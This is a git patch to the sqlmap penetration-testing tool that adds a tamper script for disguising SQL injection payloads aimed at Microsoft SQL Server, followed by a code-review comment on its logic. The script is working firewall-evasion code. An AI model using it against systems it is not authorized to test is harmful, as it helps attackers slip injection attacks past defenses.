From c9e6fc7695d9b091b27c21e44761e074f4f96eba Mon Sep 17 00:00:00 2001
From: Bernardo Damele
Date: Mon, 11 Jul 2011 09:49:58 +0000
Subject: [PATCH] Added new tamper script, tamper/space2mssqlblank.py from RS
---
tamper/space2mssqlblank.py | 91 +++++++++++++++++++++++++++++++++++++
tamper/space2randomblank.py | 10 ++--
2 files changed, 96 insertions(+), 5 deletions(-)
create mode 100644 tamper/space2mssqlblank.py
diff --git a/tamper/space2mssqlblank.py b/tamper/space2mssqlblank.py
new file mode 100644
index 000000000..dc886d5b8
--- /dev/null
+++ b/tamper/space2mssqlblank.py
@@ -0,0 +1,91 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import os
+import random
+
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.LOW
+
+def dependencies():
+ singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MSSQL))
+
+def tamper(payload):
+ """
+ Replaces space character (' ') with a random blank character from a
+ valid set of alternate characters
+
+ Example:
+ * Input: SELECT id FROM users
+ * Output: SELECT%08id%02FROM%0Fusers
+
+ Requirement:
+ * Microsoft SQL Server
+
+ Tested against:
+ * Microsoft SQL Server 2000
+ * Microsoft SQL Server 2005
+
+ Notes:
+ * Useful to bypass several web application firewalls
+ """
+
+ # ASCII table:
+ # SOH 01 start of heading
+ # STX 02 start of text
+ # ETX 03 end of text
+ # EOT 04 end of transmission
+ # ENQ 05 enquiry
+ # ACK 06 acknowledge
+ # BEL 07 bell
+ # BS 08 backspace
+ # TAB 09 horizontal tab
+ # LF 0A new line
+ # VT 0B vertical TAB
+ # FF 0C new page
+ # CR 0D carriage return
+ # SO 0E shift out
+ # SI 0F shift in
+ blanks = ['%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A']
+ retVal = payload
+
+ if payload:
+ retVal = ""
+ quote, doublequote, firstspace, end = False, False, False, False
+
+ for i in xrange(len(payload)):
+ if not firstspace:
+ if payload[i].isspace():
+ firstspace = True
+ retVal += random.choice(blanks)
+ continue
+
+ elif payload[i] == '\'':
+ quote = not quote
+
+ elif payload[i] == '"':
+ doublequote = not doublequote
+
+ elif payload[i] == '#' or payload[i:i+3] == '-- ':
+ end = True
+
+ elif payload[i] == " " and not doublequote and not quote:
+ if end:
+ retVal += random.choice(blanks[:-1])
+ else:
+ retVal += random.choice(blanks)
+
+ continue
+
+ retVal += payload[i]
+
+ return retVal
diff --git a/tamper/space2randomblank.py b/tamper/space2randomblank.py
index b23a725b1..15e9b0c25 100644
--- a/tamper/space2randomblank.py
+++ b/tamper/space2randomblank.py
@@ -36,10 +36,10 @@ def tamper(payload):
"""
# ASCII table:
- # \t 09 horizontal TAB
- # \n 0A new line
- # - 0C new page
- # \r 0D carriage return
+ # TAB 09 horizontal TAB
+ # LF 0A new line
+ # FF 0C new page
+ # CR 0D carriage return
blanks = ['%09', '%0A', '%0C', '%0D']
retVal = payload
@@ -60,7 +60,7 @@ def tamper(payload):
elif payload[i] == '"':
doublequote = not doublequote
- elif payload[i]==" " and not doublequote and not quote:
+ elif payload[i] == " " and not doublequote and not quote:
retVal += random.choice(blanks)
continue
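Review bot: In `tamper`'s `if end:` branch, `blanks[:-1]` is meant to keep `%0A` out of a trailing `-- ` comment, but that works only because `%0A` is deliberately placed last in `blanks`, out of numeric order, and nothing records it; reordering the list would silently put a newline after the comment marker, ending the comment and handing whatever follows back to the parser. I would make the dependency explicit next to the list, e.g. `blanks_in_comment = [b for b in blanks if b != '%0A']  # LF terminates a '--' comment`, and use that name in the `if end:` branch instead of slicing. The `payload[i] == '#'` test appears to be carried over from the MySQL-style sibling script: `#` is not a comment introducer in T-SQL and prefixes temp-table names, so a payload containing `#tmp` flips `end` early; the effect is only a narrower blank set, but the check is misleading in a script whose `dependencies()` warns it is MSSQL-only. Note also that only the first whitespace is matched with `isspace()` while every later one must be a literal `' '`; if that asymmetry is intentional the docstring should say so.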